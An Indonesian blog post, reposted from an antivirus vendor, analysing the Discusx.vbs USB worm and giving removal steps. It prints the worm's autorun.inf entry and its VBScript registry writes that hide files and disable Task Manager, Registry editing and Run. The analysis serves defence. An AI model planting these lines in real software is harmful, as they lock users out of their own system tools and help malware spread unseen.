• Twitter
  • Privacy Policy
  • Disclaimer
  • Contact

Blog-Riizki

  • Bussiness
    • Gadget
    • Reviews
  • Software
  • Tutorial
  • Homepage
Tutorial Discusx.vbs – Ramnit atau Bukan?

Discusx.vbs – Ramnit atau Bukan?

Unknown
Add Comment
Tutorial
Sunday, 27 January 2013
http://i48.tinypic.com/smzwut.jpg
Saya rasa virus ini hampir mirip dengan ramnit, hanya saja tidak bisa menginfeksi File.Virus Ini Dibuat menggunakan Bahasa Pemrograman Visual Basic Script (VBS). Hanya saja Virus Ini dapat mengganti Title Default Internet Explorer dan Mengubah index IE Anda.
Nama Virus : Discusx.vbs
Ukuran File : 14,956 bytes
Packer : Tidak diketahui
Icon : Icon VBS Default
Type : Virus & Worm
Encode : ScrEnc (Script Encoder)
Virus ini Akan membuat Beberapa File pada USB Anda,
File Yang Dibuat Discusx.vbs
- Membuat File-file berikut pada Drive Yang aktif di PC
Copy of Shortcut to (1).lnk
Copy of Shortcut to (2).lnk
Copy of Shortcut to (3).lnk
Copy of Shortcut to (4).lnk
- autorun.inf dan RECYCLER pada Drive yang aktif
- Membuat File Watermark.exe di Microsoft Pada Program Files
Isi autorun.inf yang dibuat Discusx.vbs
; Discus-X
[autorun]
ShellExecute = WScript.exe RECYCLER\S-l-5-2l-796845957-4l3027322-l80l67453l-l003\INF02.dat
Dan ini dari desktop.ini
; Lets Discus-X : )
[.ShellClassInfo]
IconFile=%SystemRoot%\system32\SHELL32.dll
IconIndex=31
Beberapa Registry yang diedit dah ditambahkan :
wss.regWrite "HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\Window Title", ".::Let's Discus-X::."
wss.Regwrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Hidden", "2", "REG_DWORD"
wss.Regwrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\SuperHidden", "0", "REG_DWORD"
wss.Regwrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\ShowSuperHidden", "0", "REG_DWORD"
wss.Regwrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt", "1", "REG_DWORD"
wss.Regwrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoFolderOptions", "1", "REG_DWORD"
wss.Regwrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoRun", "1", "REG_DWORD"
wss.Regwrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoFind", "1", "REG_DWORD"
wss.Regwrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System\DisableRegistryTools", "1", "REG_DWORD"
wss.Regwrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System\DisableTaskMgr", "1", "REG_DWORD"
wss.regwrite "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\RegisteredOwner","Discus-X"
Pada File HAPPY LEBARAN.htm,Terdapat Kata-Kata Berikut (Index IE)
Discus-X SAY : MET LEBARAN!
Seperti Virus Ramnit bukan? tapi virus ini tidak bisa menginfeksi File PE,HTML,htm, dan masih banyak ektensi lagi…
Bagaimana Cara Pembersihan?
- Gunakan ScreaMAV Versi Terbaru yang database “2037″
- Lalu Full Scan Computer anda
- Tunggu Hingga Discusx.vbs terdeteksi.
- Dan klik “Clean All”
Variant Discusx.vbs Yang terdeteksi
- Discusx.A
- Discusx.B
- Discusx.C
Untuk file Autorun dan Shortcut sudah terdeteksi


Sumber: http://screamav.com/web/2013/01/discusx-vbs-ramnit-atau-bukan/
Tweet
Discusx.vbs – Ramnit atau Bukan? Title : Discusx.vbs – Ramnit atau Bukan?
Description : Saya rasa virus ini hampir mirip dengan ramnit, hanya saja tidak bisa menginfeksi File.Virus Ini Dibuat menggunakan Bahasa Pemrograman Visu...
Rating : 5

0 Response to "Discusx.vbs – Ramnit atau Bukan?"

← Newer Post Older Post ⇒ Home
Subscribe to: Post Comments (Atom)

Alexa Rank

Pengunjung

Popular Post

  • MEMAKSIMALKAN SOUND LAPTOP DENGAN HDP
    Suara Sound di laptop dan komputer anda kurang keras?? Pengen yang lebih keras dan lebih maksimal lagi?? ini solusinya!! Software ini m...
  • DISTRO LINUX YANG COCOK UNTUK BELAJAR HACKING
    Buat agan yang ingin mendalami dunia hacking , agan bisa menggunakan distro linux yang saya tulis dibawa oke langsung aja ya 1. Backtra...
  • Cara Membersihkan Virus ShortCut
    1. Buka “Task Manager” dengan cara menekan “Ctrl+Alt+Del” 2. Pada Tab “Process” cari “svchost.exe” yang usernamenya nama komputer anda,...
  • Cara Mudah Membuat Tabel Pada Postingan Blog Dengan Microsoft Word
    Banyak blogger pemula yang merasa kesulitan membuat tabel pada postingan blog, apalagi tabel tersebut cukup rumit seperti ada baris atau ko...
  • All Converter Pro 1.3
    All Converter pro 1.3 ini bisa digunakan oleh kalian untuk mengconvert video ke beberapa jenis format video , ScreenShoot Cara...
  • JADWAL LENGKAP MOTO GP 2015
    Jadwal Motogp 2015 Tanggal Grand Prix Sirkuit Jam Tayang 30 Maret 2015 MotoGp Qatar Doha/Losail 01.00 13 April 2015 MotoGp Ameri...
  • Cari Uang di Twitter Via Goviral
    Untuk anda yang sudah lama mmengunakan Twitter dan memiliki follower lebih dari 10k. ini kesempatan emas buat anda karena dari ak...
  • MACAM-MACAM PARTISI PADA WINDOWS DAN LINUX
    Jenis-jenis Partisi pada Windows :                                   1. FAT (File Allocation Table)     Merupakan tipe partisi ya...
  • Apa itu Deep Web?
    Seberapa sering kita menggunakan internet? Setiap hari? Dengan menggunakan internet setiap hari, bukan berarti kita memang sudah mahir ...
  • SPESIFIKASI OPPO R7
                                                        Harga $480 ( Rp. 6.2 Jutaan) Kartu Sim Dual SIM (Nano-SIM/ Micro-SIM, dual stand-by) ...

Fan Fages

Flag Counter

Pengikut

Page Views

Copyright 2014 Blog-Riizki - All Rights Reserved ReDesign By Kaizen Template - Support KaizenThemes - Powered by Blogger